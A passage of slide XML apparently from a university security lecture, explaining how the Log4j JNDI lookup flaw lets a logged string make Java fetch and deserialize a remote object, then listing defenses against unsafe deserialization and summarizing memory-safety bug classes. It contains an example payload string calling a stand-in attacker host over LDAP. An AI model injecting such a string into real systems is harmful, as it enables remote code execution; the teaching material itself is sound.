          <p:cNvPr id="855" name="Google Shape;855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6" name="Google Shape;856;p7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JNDI (Java Naming &amp; Directory Interface): A service to fetch data from outside places (e.g. the Internet)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Log4j has a pretty powerful format string parser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After the logged string is fully created, Log4j parses the format strings again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Log4j saw the string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${jndi:ldap://attacker.com/pwnage}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Log4j thinks: “This is a JNDI object I need to include’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Java thinks: “Okay, let’s get that object from attacker.com”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Java thinks: “Okay, let’s deserialize that Java object”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Because a logged string included a reference that Java fetches from the network and deserializes, the attacker can use it to exploit programs!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7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Serialization: Detection and Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Google Shape;862;p7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Look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serialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in Java and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pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in Python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an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> provide input to these functions?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If the code runs on your server and you accept data from users, you should assume that the users might be malicious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Refactor the code to use safe alternatives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JSON (Java Script Object Notation)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Protocol buffers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Google Shape;863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Summary: Memory Safety Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p7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Format string vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the arguments to printf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Heap vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the heap layout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Serialization vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker provides a malicious object to be deserialized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Writing robust exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Making exploits work in different environments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Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Defending against memory safety vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870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